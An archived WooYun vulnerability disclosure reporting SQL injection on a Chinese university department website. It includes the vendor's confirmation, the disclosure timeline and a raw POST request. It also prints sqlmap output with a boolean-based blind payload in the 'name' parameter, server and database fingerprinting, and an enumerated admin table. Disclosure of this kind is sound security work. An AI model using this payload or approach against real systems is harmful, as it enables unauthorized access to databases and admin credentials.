乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-04: 细节已通知厂商并且等待厂商处理中 2015-12-09: 厂商已经确认,细节仅向厂商公开 2015-12-09: 厂商已经修复漏洞并主动公开,细节向公众公开
rt,多处存在注入。
http://mech.upc.edu.cn/
POST /Admin_vertifypass.asp HTTP/1.1Content-Length: 111Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://mech.upc.edu.cnCookie: ASPSESSIONIDSQTTATCC=NJIFBKDCBJHMGFBGKOBMIAHGHost: mech.upc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*%b5%c7%c2%bc=&name=-1&newpws=1&pws=1&renewpws=1
name参数存在注入
sqlmap identified the following injection point(s) with a total of 352 HTTP(s) requests:---Parameter: name (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: %b5%c7%c2%bc=&name=-2152' OR 7998=7998 AND 'hsJB'='hsJB&newpws=1&pws=1&renewpws=1---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Accesssqlmap resumed the following injection point(s) from stored session:---Parameter: name (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: %b5%c7%c2%bc=&name=-2152' OR 7998=7998 AND 'hsJB'='hsJB&newpws=1&pws=1&renewpws=1---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[1 table]+-------+| admin |+-------+
危害等级:中
漏洞Rank:8
确认时间:2015-12-09 08:00
感谢您对石油大学网络信息的关注,我们会尽快处理该问题。
2015-12-09:该网站已关闭,感谢您对中国石油大学网络信息的关心。